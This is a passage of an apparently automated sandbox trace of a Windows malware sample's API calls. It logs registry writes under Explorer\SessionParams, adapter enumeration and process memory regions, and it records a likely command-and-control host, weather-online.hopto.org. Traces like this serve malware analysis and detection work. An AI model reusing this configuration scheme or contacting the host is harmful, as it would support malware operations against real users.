lpcbData=0x1cfad4*=0x8) returned 0x2 [0030.623] LoadLibraryA (lpLibFileName="iphlpapi.dll") returned 0x74130000 [0030.827] GetProcAddress (hModule=0x74130000, lpProcName="GetAdaptersInfo") returned 0x74139263 [0030.827] GetProcAddress (hModule=0x74130000, lpProcName="GetPerAdapterInfo") returned 0x7413d3b8 [0030.827] GetAdaptersInfo (in: AdapterInfo=0x0, SizePointer=0x1cfa74 | out: AdapterInfo=0x0, SizePointer=0x1cfa74) returned 0x6f [0030.982] GetAdaptersInfo (in: AdapterInfo=0x2026d0, SizePointer=0x1cfa74 | out: AdapterInfo=0x2026d0, SizePointer=0x1cfa74) returned 0x0 [0030.998] FreeLibrary (hLibModule=0x74130000) returned 1 [0030.998] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionParams", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x72e0ed90, lpdwDisposition=0x1cfa74 | out: phkResult=0x72e0ed90*=0xcc, lpdwDisposition=0x1cfa74*=0x2) returned 0x0 [0030.998] RegSetValueExA (in: hKey=0xcc, lpValueName="Id", Reserved=0x0, dwType=0x3, lpData=0x72e0edb8*, cbData=0x8 | out: lpData=0x72e0edb8*) returned 0x0 [0030.998] RegCloseKey (hKey=0xcc) returned 0x0 [0030.998] RegQueryValueExA (in: hKey=0x7c, lpValueName="StVal", lpReserved=0x0, lpType=0x1cfadc, lpData=0x72e0edc0, lpcbData=0x1cfad4*=0x4 | out: lpType=0x1cfadc*=0x0, lpData=0x72e0edc0*=0x0, lpcbData=0x1cfad4*=0x4) returned 0x2 [0030.998] RegQueryValueExA (in: hKey=0x7c, lpValueName="EmtParam", lpReserved=0x0, lpType=0x1cfadc, lpData=0x72e0edc4, lpcbData=0x1cfad4*=0x4 | out: lpType=0x1cfadc*=0x0, lpData=0x72e0edc4*=0x0, lpcbData=0x1cfad4*=0x4) returned 0x2 [0030.998] RegQueryValueExA (in: hKey=0x7c, lpValueName="HtParam", lpReserved=0x0, lpType=0x1cfadc, lpData=0x72e0edc8, lpcbData=0x1cfad4*=0x4 | out: lpType=0x1cfadc*=0x0, lpData=0x72e0edc8*=0x10, lpcbData=0x1cfad4*=0x4) returned 0x2 [0030.998] RegQueryValueExA (in: hKey=0x7c, lpValueName="CMValue", lpReserved=0x0, lpType=0x1cfadc, lpData=0x72e0edcc, lpcbData=0x1cfad4*=0x4 | out: lpType=0x1cfadc*=0x0, lpData=0x72e0edcc*=0x0, lpcbData=0x1cfad4*=0x4) returned 0x2 [0030.998] RegQueryValueExA (in: hKey=0x7c, lpValueName="ILevelCount", lpReserved=0x0, lpType=0x1cfadc, lpData=0x72e0edd0, lpcbData=0x1cfad4*=0x4 | out: lpType=0x1cfadc*=0x0, lpData=0x72e0edd0*=0x1, lpcbData=0x1cfad4*=0x4) returned 0x2 [0030.998] RegQueryValueExA (in: hKey=0x7c, lpValueName="IListLen", lpReserved=0x0, lpType=0x1cfadc, lpData=0x72e0eddc, lpcbData=0x1cfad4*=0x4 | out: lpType=0x1cfadc*=0x0, lpData=0x72e0eddc*=0x0, lpcbData=0x1cfad4*=0x4) returned 0x2 [0030.998] RegQueryValueExA (in: hKey=0x7c, lpValueName="IList", lpReserved=0x0, lpType=0x1cfadc, lpData=0x200b28, lpcbData=0x1cfad4*=0x200 | out: lpType=0x1cfadc*=0x0, lpData=0x200b28*=0x0, lpcbData=0x1cfad4*=0x200) returned 0x2 [0030.998] RegQueryValueExA (in: hKey=0x7c, lpValueName="Installed", lpReserved=0x0, lpType=0x1cfadc, lpData=0x72e0eef0, lpcbData=0x1cfad4*=0x4 | out: lpType=0x1cfadc*=0x0, lpData=0x72e0eef0*=0x1, lpcbData=0x1cfad4*=0x4) returned 0x2 [0030.998] RegQueryValueExA (in: hKey=0x7c, lpValueName="IPlace", lpReserved=0x0, lpType=0x1cfadc, lpData=0x200d30, lpcbData=0x1cfad4*=0x64 | out: lpType=0x1cfadc*=0x0, lpData=0x200d30*=0x0, lpcbData=0x1cfad4*=0x64) returned 0x2 [0030.998] lstrlenA (lpString="") returned 0 [0030.998] GetLastError () returned 0x0 [0030.998] GetLastError () returned 0x0 [0030.998] lstrlenA (lpString="weather-online.hopto.org") returned 24 [0030.999] lstrlenA (lpString="00") returned 2 [0030.999] lstrlenA (lpString="/00/") returned 4 [0030.999] wsprintfA (in: param_1=0x200da0, param_2="%s" | out: param_1="weather-online.hopto.org") returned 24 [0030.999] wsprintfA (in: param_1=0x200dc8, param_2="%s" | out: param_1="00") returned 2 [0030.999] wsprintfA (in: param_1=0x2026d0, param_2="%s" | out: param_1="/00/") returned 4 [0030.999] lstrcatA (in: lpString1="", lpString2="weather-online.hopto.org" | out: lpString1="weather-online.hopto.org") returned="weather-online.hopto.org" [0030.999] RegSetValueExA (in: hKey=0x7c, lpValueName="IPlace", Reserved=0x0, dwType=0x3, lpData=0x200d30*, cbData=0x64 | out: lpData=0x200d30*) returned 0x0 [0030.999] RegQueryValueExA (in: hKey=0x7c, lpValueName="ISFValue", lpReserved=0x0, lpType=0x1cfadc, lpData=0x72e0edec, lpcbData=0x1cfad4*=0x104 | out: lpType=0x1cfadc*=0x0, lpData=0x72e0edec*=0x0, lpcbData=0x1cfad4*=0x104) returned 0x2 [0030.999] RegQueryValueExA (in: hKey=0x7c, lpValueName="LastId", lpReserved=0x0, lpType=0x1cfadc, lpData=0x72e0eef4, lpcbData=0x1cfad4*=0x8 | out: lpType=0x1cfadc*=0x0, lpData=0x72e0eef4*=0x0, lpcbData=0x1cfad4*=0x8) returned 0x2 [0030.999] RegQueryValueExA (in: hKey=0x7c, lpValueName="NTries", lpReserved=0x0, lpType=0x1cfadc, lpData=0x72e0eefc, lpcbData=0x1cfad4*=0x4 | out: lpType=0x1cfadc*=0x0, lpData=0x72e0eefc*=0x0, lpcbData=0x1cfad4*=0x4) returned 0x2 [0030.999] RegQueryValueExA (in: hKey=0x7c, lpValueName="IMValue", lpReserved=0x0, lpType=0x1cfadc, lpData=0x72e0ef00, lpcbData=0x1cfad4*=0x4 | out: lpType=0x1cfadc*=0x0, lpData=0x72e0ef00*=0x0, lpcbData=0x1cfad4*=0x4) returned 0x2 [0030.999] RegQueryValueExA (in: hKey=0x7c, lpValueName="LCValue", lpReserved=0x0, lpType=0x1cfadc, lpData=0x72e0eda0, lpcbData=0x1cfad4*=0x4 | out: lpType=0x1cfadc*=0x0, lpData=0x72e0eda0*=0x0, lpcbData=0x1cfad4*=0x4) returned 0x2 [0030.999] RegCloseKey (hKey=0x7c) returned 0x0 [0031.000] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionParams", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x72e0ed90, lpdwDisposition=0x1cfb98 | out: phkResult=0x72e0ed90*=0x7c, lpdwDisposition=0x1cfb98*=0x2) returned 0x0 [0031.000] RegSetValueExA (in: hKey=0x7c, lpValueName="HtParam", Reserved=0x0, dwType=0x4, lpData=0x72e0edc8*=0x1c20, cbData=0x4 | out: lpData=0x72e0edc8*=0x1c20) returned 0x0 [0031.000] GetLastError () returned 0x0 [0031.000] RegCloseKey (hKey=0x7c) returned 0x0 [0031.000] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionParams", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x72e0ed90, lpdwDisposition=0x1cfba8 | out: phkResult=0x72e0ed90*=0x7c, lpdwDisposition=0x1cfba8*=0x2) returned 0x0 [0031.000] RegSetValueExA (in: hKey=0x7c, lpValueName="StVal", Reserved=0x0, dwType=0x4, lpData=0x72e0edc0*=0x0, cbData=0x4 | out: lpData=0x72e0edc0*=0x0) returned 0x0 [0031.000] RegCloseKey (hKey=0x7c) returned 0x0 [0031.000] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionParams", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x72e0ed90, lpdwDisposition=0x1cfb98 | out: phkResult=0x72e0ed90*=0x7c, lpdwDisposition=0x1cfb98*=0x2) returned 0x0 [0031.000] RegSetValueExA (in: hKey=0x7c, lpValueName="CMValue", Reserved=0x0, dwType=0x4, lpData=0x72e0edcc*=0x0, cbData=0x4 | out: lpData=0x72e0edcc*=0x0) returned 0x0 [0031.000] RegCloseKey (hKey=0x7c) returned 0x0 [0031.000] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionParams", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x72e0ed90, lpdwDisposition=0x1cfb94 | out: phkResult=0x72e0ed90*=0x7c, lpdwDisposition=0x1cfb94*=0x2) returned 0x0 [0031.000] RegSetValueExA (in: hKey=0x7c, lpValueName="ILevelCount", Reserved=0x0, dwType=0x4, lpData=0x72e0edd0*=0x1, cbData=0x4 | out: lpData=0x72e0edd0*=0x1) returned 0x0 [0031.000] RegCloseKey (hKey=0x7c) returned 0x0 [0031.001] lstrlenA (lpString="weather-online.hopto.org") returned 24 [0031.001] lstrlenA (lpString="weather-online.hopto.org") returned 24 [0031.001] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionParams", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x72e0ed90, lpdwDisposition=0x1cfb94 | out: phkResult=0x72e0ed90*=0x7c, lpdwDisposition=0x1cfb94*=0x2) returned 0x0 [0031.001] RegSetValueExA (in: hKey=0x7c, lpValueName="IPlace", Reserved=0x0, dwType=0x3, lpData=0x200d30*, cbData=0x64 | out: lpData=0x200d30*) returned 0x0 [0031.001] RegCloseKey (hKey=0x7c) returned 0x0 [0031.003] HeapDestroy (hHeap=0x200000) returned 1 Thread: id = 15 os_tid = 0xa8c Process: id = "4" image_name = "gorctexxzx.exe" filename = "c:\\windows\\system32\\gorctexxzx.exe" page_root = "0x7ef4f720" os_pid = "0xa6c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xa3c" cmd_line = "\"C:\\Windows\\System32\\goRcteXxZX.exe\" /dll=\"C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL\" /fn_id=DllCanUnloadNow" cur_dir = "C:\\Windows\\system32\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f0e7" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 288 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 289 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 290 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 291 start_va = 0x150000 end_va = 0x24ffff entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 292 start_va = 0x11d0000 end_va = 0x11f0fff entry_point = 0x11d0000 region_type = mapped_file name = "gorctexxzx.exe" filename = "\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe") Region: id = 293 start_va = 0x77e80000 end_va = 0x77e80fff entry_point = 0x77e80000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 294 start_va = 0x77ec0000 end_va = 0x77ffbfff entry_point = 0x77ec0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 295 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 296 start_va = 0x7ffd4000 end_va = 0x7ffd4fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd4000" filename = "" Region: id = 297 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 298 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 299 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 300 start_va = 0x340000 end_va = 0x43ffff entry_point = 0x0 region_type = private name = "private_0x0000000000340000" filename = "" Region: id = 301 start_va = 0x5e0000 end_va = 0x5effff entry_point = 0x0 region_type = private name = "private_0x00000000005e0000" filename = "" Region: id = 302 start_va = 0x75f70000 end_va = 0x75fb9fff entry_point = 0x75f70000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 303 start_va = 0x761d0000 end_va = 0x762a3fff entry_point = 0x761d0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 304 start_va = 0x76300000 end_va = 0x76356fff entry_point = 0x76300000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 305 start_va = 0x765f0000 end_va = 0x765f9fff entry_point = 0x765f0000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 306 start_va = 0x767a0000 end_va = 0x773e9fff entry_point = 0x767a0000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 307 start_va = 0x773f0000 end_va = 0x7748cfff entry_point = 0x773f0000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 308 start_va = 0x77550000 end_va = 0x775f0fff entry_point = 0x77550000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 309 start_va = 0x77720000 end_va = 0x777cbfff entry_point = 0x77720000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 310 start_va = 0x77970000 end_va = 0x77acbfff entry_point = 0x77970000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 311 start_va = 0x77ad0000 end_va = 0x77b98fff entry_point = 0x77ad0000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 312 start_va = 0x77c80000 end_va = 0x77ccdfff entry_point = 0x77c80000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 313 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 317 start_va = 0x250000 end_va = 0x317fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000250000" filename = "" Region: id = 318 start_va = 0x762b0000 end_va = 0x762cefff entry_point = 0x762b0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 319 start_va = 0x77ba0000 end_va = 0x77c6bfff entry_point = 0x77ba0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 377 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 378 start_va = 0xc0000 end_va = 0xc0fff entry_point = 0x0 region_type = private name = "private_0x00000000000c0000" filename = "" Region: id = 379 start_va = 0x440000 end_va = 0x540fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 380 start_va = 0x1200000 end_va = 0x1dfffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001200000" filename = "" Region: id = 381 start_va = 0x72db0000 end_va = 0x72db2fff entry_point = 0x72db0000 region_type = mapped_file name = "api-ms-win-core-synch-l1-2-0.dll" filename = "\\Windows\\System32\\api-ms-win-core-synch-l1-2-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-core-synch-l1-2-0.dll") Region: id = 382 start_va = 0x72dd0000 end_va = 0x72e14fff entry_point = 0x72dd0000 region_type = mapped_file name = "97328f~1.dll" filename = "\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL" (normalized: "c:\\users\\eebsym5\\desktop\\97328f~1.dll") Region: id = 383 start_va = 0x762e0000 end_va = 0x762f8fff entry_point = 0x762e0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 384 start_va = 0x76700000 end_va = 0x7679ffff entry_point = 0x76700000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 385 start_va = 0xd0000 end_va = 0x14ffff entry_point = 0x0 region_type = private name = "private_0x00000000000d0000" filename = "" Region: id = 386 start_va = 0x77510000 end_va = 0x77544fff entry_point = 0x77510000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 387 start_va = 0x762d0000 end_va = 0x762d5fff entry_point = 0x762d0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 388 start_va = 0x550000 end_va = 0x5cffff entry_point = 0x0 region_type = private name = "private_0x0000000000550000" filename = "" Thread: id = 10 os_tid = 0xa70 [0030.957] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x24f634 | out: lpSystemTimeAsFileTime=0x24f634*(dwLowDateTime=0xe02cb5f0, dwHighDateTime=0x1d3dfba)) [0030.957] GetCurrentProcessId () returned 0xa6c [0030.957] GetCurrentThreadId () returned 0xa70 [0030.957] GetTickCount () returned 0x16e7b [0030.957] QueryPerformanceCounter (in: lpPerformanceCount=0x24f62c | out: lpPerformanceCount=0x24f62c*=358608436) returned 1 [0030.957] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0030.957] GetProcAddress (hModule=0x761d0000, lpProcName="FlsAlloc") returned 0x7622418d [0030.958] GetProcAddress (hModule=0x761d0000, lpProcName="FlsGetValue") returned 0x76221e16 [0030.958] GetProcAddress (hModule=0x761d0000, lpProcName="FlsSetValue") returned 0x762276e6 [0030.958] GetProcAddress (hModule=0x761d0000, lpProcName="FlsFree") returned 0x76221f61 [0030.958] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0030.958] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0030.958] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0030.958] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0030.958] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0030.958] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0030.958] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0030.958] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0030.958] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0030.958] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0030.959] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0030.959] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0030.959] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0030.959] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0030.959] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0030.959] GetProcAddress (hModule=0x761d0000, lpProcName="DecodePointer") returned 0x77f1cd10 [0030.959] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0030.959] GetProcAddress (hModule=0x761d0000, lpProcName="DecodePointer") returned 0x77f1cd10 [0030.959] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0030.960] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0030.960] GetProcAddress (hModule=0x761d0000, lpProcName="DecodePointer") returned 0x77f1cd10 [0030.960] GetCurrentThreadId () returned 0xa70 [0030.960] GetCommandLineA () returned="\"C:\\Windows\\System32\\goRcteXxZX.exe\" /dll=\"C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL\" /fn_id=DllCanUnloadNow" [0030.960] GetEnvironmentStringsW () returned 0x3578a0* [0030.960] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=992, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 992 [0030.960] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=992, lpMultiByteStr=0x1409f0, cbMultiByte=992, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ALLUSERSPROFILE=C:\\ProgramData", lpUsedDefaultChar=0x0) returned 992 [0030.960] FreeEnvironmentStringsW (penv=0x3578a0) returned 1 [0030.960] GetStartupInfoA (in: lpStartupInfo=0x24f584 | out: lpStartupInfo=0x24f584*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\System32\\goRcteXxZX.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0030.960] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0030.960] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0030.960] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0030.960] SetHandleCount (uNumber=0x20) returned 0x20 [0030.960] GetLastError () returned 0x0 [0030.960] SetLastError (dwErrCode=0x0) [0030.960] GetLastError () returned 0x0 [0030.960] SetLastError (dwErrCode=0x0) [0030.961] GetLastError () returned 0x0 [0030.961] SetLastError (dwErrCode=0x0) [0030.961] GetACP () returned 0x4e4 [0030.961] GetLastError () returned 0x0 [0030.961] SetLastError (dwErrCode=0x0) [0030.961] IsValidCodePage (CodePage=0x4e4) returned 1 [0030.961] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x24f564 | out: lpCPInfo=0x24f564) returned 1 [0030.961] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x24f030 | out: lpCPInfo=0x24f030) returned 1 [0030.961] GetLastError () returned 0x0 [0030.961] SetLastError (dwErrCode=0x0) [0030.961] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="", cchSrc=1, lpCharType=0x24efc0 | out: lpCharType=0x24efc0) returned 1 [0030.961] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x24f444, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0030.961] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x24f444, cbMultiByte=256, lpWideCharStr=0x24eda8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0030.961] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpCharType=0x24f044 | out: lpCharType=0x24f044) returned 1 [0030.961] GetLastError () returned 0x0 [0030.961] SetLastError (dwErrCode=0x0) [0030.961] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr="", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0030.961] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x24f444, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0030.961] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x24f444, cbMultiByte=256, lpWideCharStr=0x24ed78, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ矲狟Ā") returned 256 [0030.961] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ矲狟Ā", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0030.961] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" 